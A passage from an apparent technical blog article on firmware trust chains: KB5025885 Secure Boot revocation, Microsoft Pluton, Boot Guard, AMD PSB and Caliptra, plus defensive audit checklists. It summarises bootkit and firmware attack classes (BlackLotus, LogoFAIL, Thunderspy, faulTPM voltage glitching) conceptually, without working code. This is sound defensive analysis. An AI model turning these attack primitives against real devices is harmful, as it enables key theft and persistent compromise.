&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Press coverage frequently described KB5025885 as a &quot;PK rotation&quot; or &quot;Microsoft rotating the Platform Key.&quot; It is neither. The Microsoft support article spells out the actual mechanism: KB5025885 adds the Windows UEFI CA 2023 certificate (PCA2023) to the Database Key (DB) and adds the hashes of vulnerable boot manager binaries to the Forbidden Signature Key (DBX) [@kb5025885]. The Platform Key itself is not modified by KB5025885. The MSRC blog framing is consistent: KB5025885 is a staged-rollout programme for managing the revocation of vulnerable Windows boot manager binaries associated with CVE-2023-24932 [@msrc-blog-2023-24932] [@msrc-cve-2023-24932].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;KB5025885 was originally published on May 9, 2023 as part of May 2023 Patch Tuesday, in response to CVE-2023-24932 (a Secure Boot Security Feature Bypass) [@cve-2023-24932-nvd] [@kb5025885]. The CVE was the underlying vulnerability that the BlackLotus bootkit had exploited via CVE-2022-21894 several months earlier [@eset-blacklotus] [@cve-2022-21894-nvd]. Microsoft&apos;s response was structurally cautious: a multi-year staged rollout, rather than an immediate forced revocation, because forcing a &lt;code&gt;dbx&lt;/code&gt; update that would brick any unpatched Windows install or any third-party EFI loader still in distribution would have been operationally catastrophic.&lt;/p&gt;

gantt
    dateFormat YYYY-MM-DD
    title KB5025885 boot manager revocation programme
    section Disclosure
    CVE-2023-24932 published         :2023-05-09, 7d
    KB5025885 initial publication    :2023-05-09, 7d
    section Deployment
    Manual deployment phase          :2023-07-11, 270d
    Evaluation phase                 :2024-04-09, 90d
    Automatic enrollment phase       :2024-07-09, 540d
    section Cutover
    Automatic certificate replacement :2026-01-01, 150d
    PCA2011 expiration window         :2026-06-01, 30d
&lt;p&gt;The rollout dates above follow the Microsoft KB5025885 article timeline [@kb5025885]: manual deployment beginning July 11, 2023; evaluation phase beginning April 9, 2024; automatic enrolment of mitigations beginning July 9, 2024; automatic certificate replacement on Windows 11 beginning January 2026; and the PCA2011 / UEFI CA 2011 / KEK CA 2011 expiration window in June 2026. The mechanism throughout is &lt;code&gt;db&lt;/code&gt; + &lt;code&gt;dbx&lt;/code&gt; + SVN, not Platform Key rotation.&lt;/p&gt;
&lt;h3&gt;Pluton&apos;s structural role in the modern chain&lt;/h3&gt;
&lt;p&gt;Microsoft Pluton was announced on November 17, 2020 as a &quot;chip-to-cloud&quot; security processor co-designed with AMD, Intel, and Qualcomm Technologies [@pluton-blog]. The current Microsoft Learn enumeration of Pluton silicon as of 2024 reads: &quot;AMD: Ryzen 6000, 7000, 8000, 9000 and Ryzen AI Series processors; Intel: Core Ultra 200V Series, Ultra Series 3 and Series 3 processors; Qualcomm: Snapdragon 8cx Gen 3 and Snapdragon X Series processors. ... Pluton platforms in 2024 AMD and Intel systems will start to use a Rust-based firmware foundation&quot; [@pluton-learn].&lt;/p&gt;
&lt;p&gt;Pluton&apos;s structural contribution to the chain is the firmware-update channel. Discrete TPMs cannot be patched after manufacturing in any meaningful way. CSME PTT firmware ships through OEM BIOS updates with all the latency that implies. Pluton firmware reaches devices through two channels: the traditional OEM UEFI capsule that updates the SPI-resident Pluton image at boot, and an OS-mediated runtime channel through which Microsoft can ship new firmware via Windows Update [@pluton-learn] [@garrett-pluton-2022-update]. The second channel is the one no other shipping silicon root-of-trust has, and the one that closes the patch-latency gap.&lt;/p&gt;
&lt;h3&gt;Silicon comparison&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Intel Boot Guard&lt;/th&gt;
&lt;th&gt;AMD PSB&lt;/th&gt;
&lt;th&gt;&lt;a href=&quot;https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/&quot; rel=&quot;noopener&quot;&gt;Apple Silicon Boot ROM&lt;/a&gt;&lt;/th&gt;
&lt;th&gt;Google Titan-M2&lt;/th&gt;
&lt;th&gt;Microsoft Pluton&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Trust anchor&lt;/td&gt;
&lt;td&gt;FPF in PCH or package&lt;/td&gt;
&lt;td&gt;OEM-key fuse in PSP / FCH&lt;/td&gt;
&lt;td&gt;Mask ROM on the AP&lt;/td&gt;
&lt;td&gt;On-die in Titan-M2 chip&lt;/td&gt;
&lt;td&gt;On-die in SoC fabric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Revocation surface&lt;/td&gt;
&lt;td&gt;None at fuse layer&lt;/td&gt;
&lt;td&gt;None at fuse layer&lt;/td&gt;
&lt;td&gt;Vendor seed (Apple)&lt;/td&gt;
&lt;td&gt;Vendor seed (Google)&lt;/td&gt;
&lt;td&gt;Microsoft via Windows Update&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FW update channel&lt;/td&gt;
&lt;td&gt;OEM BIOS&lt;/td&gt;
&lt;td&gt;OEM BIOS&lt;/td&gt;
&lt;td&gt;macOS updates&lt;/td&gt;
&lt;td&gt;Android updates&lt;/td&gt;
&lt;td&gt;Windows Update [@pluton-learn]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OS attestation API&lt;/td&gt;
&lt;td&gt;TPM 2.0 quote (PTT)&lt;/td&gt;
&lt;td&gt;TPM 2.0 quote (fTPM)&lt;/td&gt;
&lt;td&gt;DeviceAttestationKey&lt;/td&gt;
&lt;td&gt;KeyMint attestation&lt;/td&gt;
&lt;td&gt;TPM 2.0 + Pluton-specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment posture&lt;/td&gt;
&lt;td&gt;Widespread, OEM-gated&lt;/td&gt;
&lt;td&gt;EPYC widespread, Ryzen opt-in&lt;/td&gt;
&lt;td&gt;All Apple Silicon Macs&lt;/td&gt;
&lt;td&gt;All Pixel 6 and later&lt;/td&gt;
&lt;td&gt;Ryzen 6000+, Core Ultra, X-series&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The asymmetry that matters for the article&apos;s argument is the third row. Apple, Google, and Microsoft control the firmware update channel for their respective trust anchors. Intel and AMD do not -- the OEM does, and the OEM&apos;s release cadence varies by vendor, by product line, and (for end-of-life models) drops to zero.&lt;/p&gt;
&lt;h3&gt;Bootkit comparison: same invariant, different break&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bootkit / vuln class&lt;/th&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Vulnerable layer&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;dbx state at disclosure&lt;/th&gt;
&lt;th&gt;Fix mechanism&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BlackLotus&lt;/td&gt;
&lt;td&gt;CVE-2022-21894&lt;/td&gt;
&lt;td&gt;Windows Boot Manager&lt;/td&gt;
&lt;td&gt;baton drop on unpatched bootmgfw [@eset-blacklotus]&lt;/td&gt;
&lt;td&gt;unpatched bootmgfw hashes not yet in dbx&lt;/td&gt;
&lt;td&gt;KB5025885 dbx + db + SVN programme [@kb5025885]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BootHole&lt;/td&gt;
&lt;td&gt;CVE-2020-10713 [@cve-2020-10713-nvd]&lt;/td&gt;
&lt;td&gt;GRUB2 BootHole buffer overflow&lt;/td&gt;
&lt;td&gt;GRUB2 cfg parser overflow [@eclypsium-boothole]&lt;/td&gt;
&lt;td&gt;initial dbx update exhausted 10 KB of capacity&lt;/td&gt;
&lt;td&gt;dbx hash list bump (SBAT later introduced to solve scale) [@sbat-md]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LogoFAIL&lt;/td&gt;
&lt;td&gt;multiple in 2023&lt;/td&gt;
&lt;td&gt;UEFI DXE image-parsing libraries&lt;/td&gt;
&lt;td&gt;malicious BMP / PNG / JPEG in boot logo region&lt;/td&gt;
&lt;td&gt;Boot Guard verifier passed; DXE parser exploited&lt;/td&gt;
&lt;td&gt;per-OEM firmware update + library fixes [@binarly-logofail]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bootkitty&lt;/td&gt;
&lt;td&gt;(PoC, 2024)&lt;/td&gt;
&lt;td&gt;User-controlled trust posture&lt;/td&gt;
&lt;td&gt;Self-signed bootkit plus in-memory GRUB integrity-check patches before kernel hand-off [@bootkitty]&lt;/td&gt;
&lt;td&gt;dbx unchanged for Bootkitty PoC&lt;/td&gt;
&lt;td&gt;Keep Secure Boot enabled; audit MOK enrolments; SBAT is not the corrective surface for this class [@bootkitty]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The common pattern is the same invariant -- &quot;the chain is only as strong as the rung that was broken&quot; -- with four different break points:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BlackLotus&lt;/strong&gt; broke at rung 9 (Boot Manager); the fix lived at rung 7 (Secure Boot policy via dbx).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BootHole&lt;/strong&gt; broke at rung 10 (the chain-loaded GRUB2); the fix lived at rung 7 again (dbx, until SBAT replaced the per-hash approach).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;LogoFAIL&lt;/strong&gt; broke at rung 6 (a DXE image-parsing library); the fix had to live at rung 6 as well, because the verifier at rung 7 had already approved the binary.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bootkitty&lt;/strong&gt; did not break at shim or GRUB2; it operated alongside them, under the assumption Secure Boot was either disabled or the attacker&apos;s certificate had been pre-enrolled into MOK. ESET&apos;s primary disclosure confirms it is self-signed and patches GRUB integrity-check functions in memory after being loaded [@bootkitty].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The LogoFAIL story is especially instructive. Binarly&apos;s December 6, 2023 disclosure showed that Boot Guard validates the firmware image, but the image then parses attacker-controlled logo data through CVE-laden image parsers, executing attacker code in DXE without crossing any signature boundary [@binarly-logofail] [@binarly-logofail-slides] [@hackernews-logofail] [@darkreading-logofail].&lt;/p&gt;
&lt;p&gt;Pluton is the most aggressive structural answer to the asymmetric-revocation problem on shipping silicon. But Pluton is not the only structural answer -- and even Pluton inherits one rung of OEM trust. The next section is the competing-approaches map.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches: Microsoft Pluton vs the Chipset Fuse Model&lt;/h2&gt;
&lt;p&gt;Pluton and Boot Guard are not competing for the same rung. They compose. Pluton sits in the SoC fabric on supported silicon and provides a TPM 2.0 service plus a Microsoft-controlled firmware-update channel; Boot Guard and PSB continue to verify the BIOS image at the silicon-verifier rung [@pluton-learn]. The interesting design fight is not Pluton-versus-Boot-Guard, it is Pluton-versus-the-OEM-controlled-fuse for the role of &lt;em&gt;trust anchor of last resort&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;Pluton&apos;s value proposition&lt;/h3&gt;
&lt;p&gt;Pluton&apos;s pitch, as Microsoft has articulated it since the November 2020 announcement, is to cycle the trust anchor from the OEM&apos;s fuse to a Microsoft-controlled root of trust that also lives in silicon but whose firmware can ship through Windows Update [@pluton-blog].&lt;/p&gt;
&lt;p&gt;The trade is explicit: trust goes from &quot;OEM, with no Microsoft visibility into key-management hygiene&quot; to &quot;Microsoft, with the platform integrated into Microsoft&apos;s signing infrastructure and update cadence.&quot;&lt;/p&gt;
&lt;p&gt;The shift cuts two ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For organisations whose threat model treats OEM-key-management hygiene as the weakest link (and the MSI 2023 leak makes a strong empirical case for that view), Pluton is a structural improvement.&lt;/li&gt;
&lt;li&gt;For organisations whose threat model treats Microsoft as a higher-risk root than the OEM, Pluton makes things worse on net.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;The Pluton-present-is-not-Pluton-enabled trap&lt;/h3&gt;

On April 11, 2022, Matthew Garrett published a reverse engineering of the ROG Zephyrus G14, an AMD Ryzen 6000 laptop, showing that &quot;PSP directory entry 0xB BIT36 have the highest priority... If bit 36 is set, the PSP tells Pluton to turn itself off&quot; [@garrett-pluton-2022].&lt;p&gt;The procurement consequence is easy to miss. Pluton-equipped silicon ships from AMD with Pluton present in the die, but the OEM can flip a single bit in the PSP firmware directory at manufacturing time that gates Pluton entirely. The platform passes &quot;Pluton-equipped&quot; advertising checks while Pluton is functionally disabled.&lt;/p&gt;
&lt;p&gt;Garrett&apos;s December 2022 follow-up documented that Lenovo&apos;s ThinkPad Z13 shipped with Pluton default-disabled and exposed two ACPI device IDs (MSFT0101 and MSFT0200) that platform tooling could use to detect the configuration [@garrett-pluton-2022-update]. The operational lesson: &quot;Has Pluton&quot; is not the same question as &quot;Pluton is enabled and acting as the TPM 2.0 endpoint.&quot;
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Windows, &lt;code&gt;Get-Tpm | Select-Object ManufacturerIdTxt, ManufacturerVersion&lt;/code&gt; returns the TPM 2.0 endpoint vendor and version. A Pluton-active platform reports &lt;code&gt;MSFT&lt;/code&gt; as the manufacturer; a CSME PTT platform reports &lt;code&gt;INTC&lt;/code&gt;; an AMD fTPM platform reports &lt;code&gt;AMD&lt;/code&gt;; a discrete TPM reports the dTPM vendor (Infineon, Nuvoton, STMicroelectronics, etc.). This is the simplest field-confirmable check for which endpoint is actually serving as the TPM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;AMD PSB on EPYC versus Ryzen&lt;/h3&gt;
&lt;p&gt;AMD Platform Secure Boot has a deployment split that maps onto the consumer-versus-datacenter market structure. On EPYC, PSB-enforced is widely deployed: the datacenter customer wants the silicon-rooted verifier and is willing to accept the cost.&lt;/p&gt;
&lt;p&gt;The cost on EPYC is sharp. Once an OEM has burned its key hash into the PSP fuse on a given CPU, that CPU is irreversibly locked to that OEM. The chip cannot be resold into another OEM&apos;s platform that uses a different OEM key. Secondary-market liquidity for fused EPYC parts is essentially zero. This is not a hypothetical liability. Datacenter operators who refresh hardware on a 3-5 year cycle find that PSB-fused EPYC parts have markedly lower resale value than equivalent non-fused parts. The &quot;right answer&quot; depends on the customer&apos;s threat model, but the trade is real.&lt;/p&gt;
&lt;p&gt;On Ryzen client parts, PSB has historically been opt-in per platform; many consumer Ryzen systems ship with PSB unfused and Pluton (where present) gated by the soft-fuse [@amd-psb-whitepaper] [@garrett-pluton-2022].&lt;/p&gt;
&lt;h3&gt;Caliptra: the open multi-signer answer&lt;/h3&gt;
&lt;p&gt;The most ambitious structural answer to the MSI-leak problem currently in active development is Caliptra, a CHIPS Alliance project announced on December 13, 2022 [@chipsalliance-caliptra]. Caliptra is &quot;the specification, silicon logic, ROM and firmware for implementing a Root of Trust for Measurement (RTM) block inside an SoC&quot; [@caliptra-repo]. The full RTL is open at &lt;code&gt;chipsalliance/caliptra-rtl&lt;/code&gt; [@caliptra-rtl] and the firmware at &lt;code&gt;chipsalliance/caliptra-sw&lt;/code&gt; [@caliptra-sw], both under Apache 2.0. The founding members include AMD, Google, Microsoft, and NVIDIA.&lt;/p&gt;
&lt;p&gt;The structural properties Caliptra targets, which neither Boot Guard, PSB, nor Pluton currently provide on commodity client silicon, are: (1) open RTL so the trust anchor&apos;s silicon implementation is auditable gate-by-gate; (2) multi-signer support so a single OEM key compromise does not unilaterally compromise the trust chain; (3) datacenter-class scope first, with the design choices that follow from that target. Caliptra is not yet on shipping client silicon. It is the negative-space answer to the MSI leak: the structural fix that the chipset-fuse model does not have, but that the architecture community has now spent four years designing in the open.&lt;/p&gt;
&lt;p&gt;Pluton closes the patch-latency gap. Caliptra closes the single-signer gap. Neither closes the supply-chain-of-silicon gap. That is the next section.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: Where the Chain Cannot Reach&lt;/h2&gt;
&lt;p&gt;Every defensive chain has a payload at the bottom -- the thing the chain ultimately protects against. The pre-boot trust chain protects against five attack classes. Here are the five it does not.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The chain closes three threat classes well (OS-level rootkit persistence; signed-but-revoked bootloader chain-loading; remote firmware reflash without physical access) and structurally cannot close two others (physical-SPI-access before the platform is fused and locked; leaked OEM key on already-shipped silicon). Naming both sets is the precondition for any honest threat-model claim.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Limit 1 -- Physical SPI access bypasses everything above it&lt;/h3&gt;
&lt;p&gt;Even with Boot Guard or PSB enforced, an attacker who can write to SPI flash before the platform is fused and locked can overwrite the IBB and the BPM and own the next boot. Access vectors: manufacturing, repair, or certain integrated circuits that expose SPI on a debug header.&lt;/p&gt;
&lt;p&gt;CHIPSEC [@chipsec-repo] [@chipsec-page] -- originated by Bulygin and colleagues at CanSecWest 2014 [@c7zero-chipsec] -- is the canonical pre-deployment audit framework for verifying the chipset write-protect bits on shipping platforms. Trammell Hudson&apos;s Thunderstrike, presented at 31C3 in December 2014 [@thunderstrike] [@ccc-31c3], is the canonical real-world demonstration: SPI substitution via a Thunderbolt Option ROM on Apple Mac EFI. It is the existence proof that &quot;physical access plus the right bus&quot; can bypass the silicon-rooted verifier when the platform&apos;s write-protections are not fully engaged.&lt;/p&gt;
&lt;h3&gt;Limit 2 -- A leaked OEM key cannot be revoked at the fuse layer&lt;/h3&gt;
&lt;p&gt;The MSI 2023 incident, recompressed: the FPF stores the &lt;em&gt;hash&lt;/em&gt; of the OEM Boot Guard public key, not a revocation list against that hash. There is no fuse-layer primitive for marking the hash as &quot;revoked.&quot; Once the corresponding private key leaks, every chip carrying that hash is permanently downgraded to a model in which the attacker can sign new Boot Guard firmware that the platform will accept [@binarly-msi] [@helpnet-msi-leak] [@register-msi-alt].&lt;/p&gt;
&lt;p&gt;The structural fix is per-batch key derivation or multi-signer trust anchors; on commodity client silicon in 2026 this fix exists only as a design specification (Caliptra) and not as a shipped product [@caliptra-repo] [@chipsalliance-caliptra]. Eclypsium&apos;s &quot;Vulnerable Boot Guard implementations&quot; series [@eclypsium-blog] documents that the MSI leak is the third or fourth such incident across the Boot Guard vendor space. Lenovo, HP, Compal, and Quanta have all experienced similar leaks; MSI is simply the most extensively catalogued.&lt;/p&gt;
&lt;h3&gt;Limit 3 -- The trust chain cannot defend against malicious silicon&lt;/h3&gt;
&lt;p&gt;If the verifier chip itself is malicious -- substituted upstream of the customer&apos;s supply chain -- the chain&apos;s invariants do not hold, because the bottom of the chain is what defines the trust model. Defending against this class is the supply-chain-of-silicon problem and is out of scope for this article. The open-RTL property of Caliptra is partial mitigation in the sense that the customer can at least verify that the silicon matches the specification, but verifying that a fabricated die corresponds to its RTL is an entirely separate research programme.&lt;/p&gt;
&lt;h3&gt;Limit 4 -- Thunderbolt SPI is a separate SPI region&lt;/h3&gt;

Bjorn Ruytenberg&apos;s Thunderspy disclosure on May 10, 2020 [@thunderspy-report] [@thunderspy-site] targeted firmware vulnerabilities in the Thunderbolt controller chip on PCs with Thunderbolt 1 / 2 / 3 ports. The controller has its own firmware in its own SPI region, distinct from the main BIOS SPI region that Boot Guard / PSB verify.&lt;p&gt;Thunderspy let an attacker with physical access to the port flash modified Thunderbolt controller firmware, weakening the DMA isolation Thunderbolt 3 was supposed to provide. Thunderspy did &lt;em&gt;not&lt;/em&gt; bypass Boot Guard, PSB, or Secure Boot. It bypassed a different verifier in a different SPI region for a different protocol.&lt;/p&gt;
&lt;p&gt;The conflation -- &quot;Thunderspy broke Secure Boot&quot; -- appeared in early press coverage and persists in some secondary writing. The primary report is unambiguous that the target was Thunderbolt controller firmware [@thunderspy-report].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The structural lesson generalises beyond Thunderbolt: &quot;SPI&quot; on a modern PC is not a single trust domain. The main BIOS region, the Thunderbolt controller, the Embedded Controller, the fingerprint reader, and (on servers) the BMC each have their own SPI regions, their own update mechanisms, and their own verifier (if any). A vulnerability in one does not necessarily affect the others; but inventorying which regions are independently verified is a non-trivial procurement exercise.&lt;/p&gt;
&lt;h3&gt;Limit 5 -- The ME and PSP are themselves attack surface&lt;/h3&gt;
&lt;p&gt;The CSME and PSP exist to verify the platform&apos;s trust chain, but they are themselves programs running on processors. They have bugs. The disclosure record is sobering:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;INTEL-SA-00086 (November 2017).&lt;/strong&gt; Remote code execution in CSME via CVE-2017-5705, CVE-2017-5706, CVE-2017-5708, and CVE-2017-5712, pre-disclosed by the Ermolov / Goryachy BH EU 2017 work [@intel-sa-00086] [@ermolov-goryachy-2017].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2020-8705.&lt;/strong&gt; A Boot Guard ACM vulnerability in the S3-resume code path that Trammell Hudson wrote up [@cve-2020-8705-nvd] [@trmm-sleep].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;One Glitch to Rule Them All (CCS 2021).&lt;/strong&gt; Buhren, Jacob, Krachenfels, and Seifert demonstrated voltage-glitching attacks against the AMD PSP on Zen 1, Zen 2, and Zen 3 [@one-glitch-2021], with open tooling at &lt;code&gt;PSPReverse/amd-sp-glitch&lt;/code&gt; [@psp-glitch-repo].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;faulTPM (USENIX Security 2024).&lt;/strong&gt; The follow-up paper (arXiv v1 April 28, 2023) showed the same primitive could extract sealed TPM blobs from AMD fTPM, enabling &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; key recovery on devices using AMD fTPM-as-TPM [@faultpm-2023].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The faulTPM hardware cost is in the low hundreds of US dollars (commodity microcontroller plus voltage-glitching circuit). The capability the cost buys is full extraction of fTPM-sealed blobs. The &quot;expensive nation-state-grade attack&quot; framing does not apply here.&lt;/p&gt;
&lt;p&gt;These attacks do not break the &lt;em&gt;concept&lt;/em&gt; of a silicon-rooted trust chain. They break specific implementations of it. The conceptual chain is sound; the engineering surface inside each implementation has bugs that, once disclosed, get patched and shifted up the cadence. The pattern is structurally similar to OS kernel CVE disclosures. The existence of bugs does not mean the kernel concept fails; it means kernels need patch cadence. The difference at the firmware layer is that patch cadence at the CSME or PSP runs through the OEM BIOS update pipeline, which is slower than the OS pipeline by a factor of roughly ten.&lt;/p&gt;
&lt;p&gt;Five limits. The first three are deep. The last two are open research.&lt;/p&gt;
&lt;h2&gt;9. Open Problems: What Is Still Being Researched&lt;/h2&gt;
&lt;p&gt;Five open problems. Three are about the chain. Two are about who gets to see inside it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OEM key-management hygiene at industry scale.&lt;/strong&gt; The Eclypsium series on leaked Boot Guard keys covers Compal, Quanta, Lenovo, and MSI across multiple disclosures [@eclypsium-blog]. The structural fix -- per-batch keys, multi-signer trust anchors, hardware-bound signing services -- exists as Caliptra in specification [@caliptra-repo] but not in shipping client silicon. The 2026 research question is not &quot;do we know how to solve this&quot; but &quot;when and on which silicon families does Caliptra (or an equivalent) actually ship to consumer platforms.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pluton firmware-runtime transparency.&lt;/strong&gt; Microsoft has committed to a &quot;Rust-based firmware foundation&quot; for Pluton on 2024+ AMD and Intel systems [@pluton-learn] but has not publicly named the specific runtime. Community speculation around Tock OS [@tockos] (an embedded Rust kernel designed for security-critical microcontrollers) remains speculation; the connection has not been confirmed by Microsoft. Microsoft also has not published gate-level documentation of the Pluton silicon. The accountability gap -- &quot;we asked you to trust this runtime; what is it&quot; -- is itself an open problem and is the single most-cited objection to Pluton in the open-firmware community.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Linux side of the KB5025885 transition.&lt;/strong&gt; Shim distributions must coordinate with the PCA2011 to PCA2023 cutover or face boot failures on enforced-Secure-Boot multi-OS estates [@garrett-shim-19448] [@garrett-shim-17872] [@sbat-md]. Matthew Garrett&apos;s 2012 first-hand description of shim remains the cross-vendor architectural reference, and his 2022 / 2023 follow-ups document the operational hazards. The risk is not theoretical: a distribution that ships a shim signed only by PCA2011 and does not coordinate the migration to PCA2023 will not boot on Windows 11 systems that have completed the KB5025885 cutover.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vendor-level attestation incompatibility.&lt;/strong&gt; TCG TPM 2.0 quotes [@tcg-tpm-lib] are widely supported, but vendor-level attestation (Intel SGX DCAP [@sgx-dca], AMD SEV-SNP attestation, Pluton attestation) remain three incompatible schemes with three sets of root certificates, three quote formats, and three verifier libraries. A relying party that wants to attest a &lt;a href=&quot;https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/&quot; rel=&quot;noopener&quot;&gt;Confidential VM&lt;/a&gt; running on a mixed-vendor fleet must integrate against all three. The TPM 2.0 quote covers only the rungs visible to the TPM; it does not attest the CSME runtime, the PSP runtime, or the Pluton runtime in a vendor-neutral way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DRTM deployment and revocation maturity.&lt;/strong&gt; Windows 11 Secured-core requires DRTM via Intel TXT or AMD SKINIT, but mature revocation for DRTM-measured payloads is nascent. AMD fTPM glitch resistance on Zen 4+ is not yet publicly gate-level documented; the faulTPM team explicitly left Zen 4+ for future work [@faultpm-2023], and the absence of vendor disclosure leaves the question open at the level of public knowledge.&lt;/p&gt;
&lt;p&gt;That is the research frontier. What follows is the practitioner&apos;s manual.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide: How to Audit, Configure, and Reason About the Chain&lt;/h2&gt;
&lt;p&gt;Three audiences. Three checklists. One decision tree.&lt;/p&gt;
&lt;h3&gt;For the procurement architect: the seven-question silicon checklist&lt;/h3&gt;

flowchart TD
    Q1{&quot;Boot Guard enforced (profile 4 or 5) on Intel, or PSB-enforced on AMD?&quot;}
    Q2{&quot;PSB-fused to the correct OEM (not another OEM&apos;s key)?&quot;}
    Q3{&quot;Pluton present AND not gated by the OEM soft fuse?&quot;}
    Q4{&quot;DRTM-capable, Intel TXT or AMD SKINIT?&quot;}
    Q5{&quot;KB5025885 cumulative update applied?&quot;}
    Q6{&quot;PCA2023 present in db?&quot;}
    Q7{&quot;dbx SVN current per Microsoft January 2026 baseline?&quot;}
    OK[Procurement-grade Secured-core posture]
    BAD[Reject or remediate before deployment]
    Q1 -- yes --&amp;gt; Q2
    Q1 -- no --&amp;gt; BAD
    Q2 -- yes --&amp;gt; Q3
    Q2 -- no --&amp;gt; BAD
    Q3 -- yes --&amp;gt; Q4
    Q3 -- no --&amp;gt; BAD
    Q4 -- yes --&amp;gt; Q5
    Q4 -- no --&amp;gt; BAD
    Q5 -- yes --&amp;gt; Q6
    Q5 -- no --&amp;gt; BAD
    Q6 -- yes --&amp;gt; Q7
    Q6 -- no --&amp;gt; BAD
    Q7 -- yes --&amp;gt; OK
    Q7 -- no --&amp;gt; BAD
&lt;h3&gt;For the firmware engineer: SBAT versus dbx revocation capacity&lt;/h3&gt;
&lt;p&gt;The asymmetric-revocation point gets sharper when you run it as code. The shim SBAT documentation makes the capacity claim concrete: &quot;This single revocation event consumes 10kB of the 32kB, or roughly one third, of revocation storage typically available on UEFI platforms&quot; [@sbat-md]. The block below shows what a single SBAT generation bump replaces in dbx storage.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;const DBX_CAPACITY_BYTES = 32 * 1024; const SHA256_HASH_BYTES  = 32; const SBAT_ENTRY_BYTES   = 40; const dbxCapacityHashes  = Math.floor(DBX_CAPACITY_BYTES / SHA256_HASH_BYTES); const sbatCapacityEntries = Math.floor(DBX_CAPACITY_BYTES / SBAT_ENTRY_BYTES); console.log(&apos;dbx capacity in SHA-256 hashes  :&apos;, dbxCapacityHashes); console.log(&apos;Equivalent SBAT generation rows :&apos;, sbatCapacityEntries); console.log(); const vulnerableShimBuilds = 256; const dbxBytesForShim  = vulnerableShimBuilds * SHA256_HASH_BYTES; const dbxFractionUsed  = (dbxBytesForShim / DBX_CAPACITY_BYTES * 100).toFixed(1); const sbatBytesForShim = 1 * SBAT_ENTRY_BYTES; const sbatFractionUsed = (sbatBytesForShim / DBX_CAPACITY_BYTES * 100).toFixed(1); console.log(&apos;Revoking&apos;, vulnerableShimBuilds, &apos;distinct vulnerable shim builds:&apos;); console.log(&apos;  via dbx hashes :&apos;, dbxBytesForShim, &apos;bytes -&apos;, dbxFractionUsed + &apos;% of capacity&apos;); console.log(&apos;  via SBAT bump  :&apos;, sbatBytesForShim, &apos;bytes -&apos;, sbatFractionUsed + &apos;% of capacity&apos;); console.log(); console.log(&apos;SBAT is roughly 256x more capacity-efficient at revoking entire vulnerability classes.&apos;);&lt;/code&gt;}&lt;/p&gt;
&lt;h3&gt;For the detection engineer: CHIPSEC modules per chain rung&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Chain rung&lt;/th&gt;
&lt;th&gt;CHIPSEC module&lt;/th&gt;
&lt;th&gt;What it audits&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;SPI access policy (rung 1-2)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;common.spi_access&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SPI controller access permissions and region descriptors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
